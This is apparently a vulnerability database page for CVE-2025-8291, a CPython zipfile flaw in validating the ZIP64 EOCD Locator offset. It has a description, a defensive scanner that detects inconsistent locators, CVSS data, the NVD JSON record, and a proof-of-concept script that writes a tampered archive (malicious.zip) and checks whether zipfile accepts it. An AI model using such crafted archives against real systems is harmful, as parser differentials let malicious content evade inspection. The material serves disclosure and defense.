Security Vulnerability Report
CVE-2025-8291 CVSS 4.3 MEDIUM

CVE-2025-8291

Published: 2025-10-07 18:16:00
Last Modified: 2026-04-15 00:35:42

Description

The 'zipfile' module would not check the validity of the ZIP64 End of Central Directory (EOCD) Locator record: the offset value stored in the locator was not used to locate the ZIP64 EOCD record; instead, the ZIP64 EOCD record was assumed to be the previous record in the ZIP archive. This could be abused to create ZIP archives that are handled differently by the 'zipfile' module compared to other ZIP implementations. The remediation keeps this behavior but checks that the offset specified in the ZIP64 EOCD Locator record matches the expected value.
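
The following scanner is added here as an illustration and is not CPython's code or part of the advisory. It performs the consistency check the remediation describes from the outside: locate the EOCD record, read the ZIP64 EOCD Locator that precedes it, and compare the offset declared in the locator with the position of the record immediately before the locator, which is where a "previous record" parser looks. It assumes the fixed record layouts from the ZIP application note (22-byte EOCD, 20-byte locator, 56-byte ZIP64 EOCD record). The sample archive it builds is constructed inline (a zero-entry ZIP64 archive) and is not a real file; the 0xDEADBEEF value is taken from the PoC on this page.

```python
import struct
import sys

# Fixed record layouts from the ZIP application note (APPNOTE sections 4.3.14-4.3.16).
SIG_EOCD = 0x06054B50           # End of central directory record: 22 bytes + comment
SIG_ZIP64_LOCATOR = 0x07064B50  # ZIP64 EOCD locator: 20 bytes
SIG_ZIP64_EOCD = 0x06064B50     # ZIP64 EOCD record: 56-byte fixed part
EOCD_SIZE = 22
LOCATOR_SIZE = 20
ZIP64_EOCD_SIZE = 56


def find_eocd(data: bytes) -> int:
    """Return the position of the EOCD record, or -1 if the data has none.

    The archive comment may be up to 65535 bytes, so scan backwards through the
    tail for a signature whose declared comment length ends exactly at EOF.
    """
    sig = struct.pack('<I', SIG_EOCD)
    tail_start = max(0, len(data) - EOCD_SIZE - 0xFFFF)
    pos = data.rfind(sig, tail_start)
    while pos != -1:
        comment_len = struct.unpack_from('<H', data, pos + 20)[0]
        if pos + EOCD_SIZE + comment_len == len(data):
            return pos
        pos = data.rfind(sig, tail_start, pos)
    return -1


def check_zip64_locator(data: bytes) -> dict:
    """Classify the ZIP64 EOCD Locator offset of an archive.

    'status' is one of:
      no_eocd          - no usable EOCD record, not a ZIP archive
      not_zip64        - no ZIP64 locator precedes the EOCD record
      ok               - locator offset equals the position of the preceding ZIP64 EOCD record
      offset_mismatch  - locator offset disagrees with that position (the CVE-2025-8291 case)
    The offsets involved are returned alongside so a scanner can log them.
    """
    eocd_pos = find_eocd(data)
    if eocd_pos == -1:
        return {'status': 'no_eocd'}
    loc_pos = eocd_pos - LOCATOR_SIZE
    if loc_pos < 0 or struct.unpack_from('<I', data, loc_pos)[0] != SIG_ZIP64_LOCATOR:
        return {'status': 'not_zip64', 'eocd': eocd_pos}
    # Locator: signature(4) | disk holding the ZIP64 EOCD(4) | offset of ZIP64 EOCD(8) | total disks(4)
    _, disk, declared, total_disks = struct.unpack_from('<IIQI', data, loc_pos)
    # Where a parser that assumes "the previous record" expects the ZIP64 EOCD to be
    adjacent = loc_pos - ZIP64_EOCD_SIZE
    # Does the declared offset land on a real ZIP64 EOCD signature inside the file?
    declared_valid = (0 <= declared <= len(data) - ZIP64_EOCD_SIZE
                      and struct.unpack_from('<I', data, declared)[0] == SIG_ZIP64_EOCD)
    result = {'eocd': eocd_pos, 'locator': loc_pos, 'declared': declared,
              'adjacent': adjacent, 'declared_points_at_record': declared_valid,
              'disk': disk, 'total_disks': total_disks}
    result['status'] = 'ok' if (declared_valid and declared == adjacent) else 'offset_mismatch'
    return result


def build_sample_zip64(locator_offset: int = 0) -> bytes:
    """Constructed sample: a minimal zero-entry ZIP64 archive (not a real file).

    Layout: ZIP64 EOCD record at 0, locator at 56, EOCD at 76. The locator's
    offset field is set to locator_offset; 0 is consistent with the layout,
    anything else reproduces the inconsistency the advisory describes.
    """
    zip64_eocd = struct.pack('<IQHHIIQQQQ', SIG_ZIP64_EOCD, ZIP64_EOCD_SIZE - 12,
                             45, 45, 0, 0, 0, 0, 0, 0)
    locator = struct.pack('<IIQI', SIG_ZIP64_LOCATOR, 0, locator_offset, 1)
    eocd = struct.pack('<IHHHHIIH', SIG_EOCD, 0, 0, 0, 0, 0, 0, 0)
    return zip64_eocd + locator + eocd


if __name__ == '__main__':
    if len(sys.argv) == 2:
        with open(sys.argv[1], 'rb') as f:
            print(check_zip64_locator(f.read()))
    else:
        print('consistent:', check_zip64_locator(build_sample_zip64()))
        print('tampered:  ', check_zip64_locator(build_sample_zip64(0xDEADBEEF)))
```

Run it with a path argument to inspect an archive, or without arguments to see the two constructed cases. A status of offset_mismatch means a parser that follows the locator offset and a parser that assumes adjacency will read different ZIP64 EOCD records (or one of them will fail); such archives can be rejected or quarantined before they reach an unpatched interpreter.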

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Python (CPython) < fixed version (affects the 3.10.x, 3.11.x, 3.12.x and 3.13.x branches)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2025-8291: Python zipfile module ZIP64 EOCD Locator offset validation bypass
This PoC creates a malicious ZIP64 archive with an inconsistent ZIP64 EOCD Locator offset.
"""
import struct
import zipfile
import io

# ZIP64 EOCD Locator layout (20 bytes): signature(4) | disk with ZIP64 EOCD(4) |
# offset of ZIP64 EOCD record(8) | total disks(4). The offset field starts at +8.
ZIP64_LOCATOR_SIG = struct.pack('<I', 0x07064B50)
LOCATOR_OFFSET_FIELD = 8
LOCATOR_SIZE = 20
EOCD_SIZE = 22


def create_malicious_zip64():
    """Create a ZIP64 archive with manipulated EOCD Locator offset."""
    buf = io.BytesIO()
    # Create a normal ZIP file first. CPython only writes the ZIP64 EOCD record and
    # locator when a classic limit is exceeded, so pad the archive past the 16-bit
    # entry-count limit; a single small entry would never produce a locator.
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_STORED) as zf:
        zf.writestr('test.txt', 'Hello World')
        for i in range(zipfile.ZIP_FILECOUNT_LIMIT):
            zf.writestr(f'pad/{i}', b'')
    data = bytearray(buf.getvalue())
    # Find the ZIP64 EOCD Locator signature (0x07064B50). The locator sits
    # immediately before the 22-byte EOCD record, so only the tail is searched.
    locator_pos = data.rfind(ZIP64_LOCATOR_SIG, len(data) - EOCD_SIZE - LOCATOR_SIZE)
    if locator_pos == -1:
        raise RuntimeError("no ZIP64 EOCD Locator found; archive is not ZIP64")
    # Overwrite the 8-byte offset field with an incorrect value.
    # The original offset points at the ZIP64 EOCD record; 0xDEADBEEF points at nothing.
    struct.pack_into('<Q', data, locator_pos + LOCATOR_OFFSET_FIELD, 0xDEADBEEF)
    print(f"[*] Modified ZIP64 EOCD Locator offset at position {locator_pos + LOCATOR_OFFSET_FIELD}")
    print("[*] New offset value: 0xDEADBEEF (invalid)")
    return bytes(data)


def verify_vulnerability():
    """Verify the vulnerability by parsing the malicious ZIP."""
    malicious_zip = create_malicious_zip64()
    # Save malicious ZIP to disk
    with open('malicious.zip', 'wb') as f:
        f.write(malicious_zip)
    print("[+] Saved malicious ZIP to malicious.zip")
    # Try to open with Python's zipfile. Vulnerable behavior: the locator offset is
    # ignored and the archive opens; a patched interpreter raises BadZipFile.
    try:
        with zipfile.ZipFile(io.BytesIO(malicious_zip), 'r') as zf:
            print("[+] Python zipfile opened the malicious ZIP successfully")
            print("[!] This demonstrates the vulnerability - offset validation missing")
            names = zf.namelist()
            print(f" - {len(names)} entries, first: {names[0]}")
    except zipfile.BadZipFile as e:
        print(f"[-] Python zipfile rejected the archive (patched): {e}")


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-8291 PoC - ZIP64 EOCD Locator Offset Bypass")
    print("=" * 60)
    verify_vulnerability()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-8291", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:16:00.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 'zipfile' module would not check the validity of the ZIP64 End of\nCentral Directory (EOCD) Locator record offset value would not be used to\nlocate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be\nassumed to be the previous record in the ZIP archive. This could be abused\nto create ZIP archives that are handled differently by the 'zipfile' module\ncompared to other ZIP implementations.\n\n\nRemediation maintains this behavior, but checks that the offset specified\nin the ZIP64 EOCD Locator record matches the expected value."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1285"}]}], "references": [{"url": "https://github.com/python/cpython/commit/162997bb70e067668c039700141770687bc8f267", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/1d29afb0d6218aa8fb5e1e4a6133a4778d89bb46", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/333d4a6f4967d3ace91492a39ededbcf3faa76a6", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/76437ac248ad8ca44e9bf697b02b1e2241df2196", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/8392b2f0d35678407d9ce7d95655a5b77de161b4", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/bca11ae7d575d87ed93f5dd6a313be6246e3e388", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/d11e69d6203080e3ec450446bfed0516727b85c3", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/issues/139700", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/pull/139702", "source": "[email protected]"}, {"url": "https://mail.python.org/archives/list/[email protected]/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/", "source": "[email protected]"}, {"url": "https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://github.com/psf/advisory-database/blob/main/advisories/python/PSF-2025-12.json", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```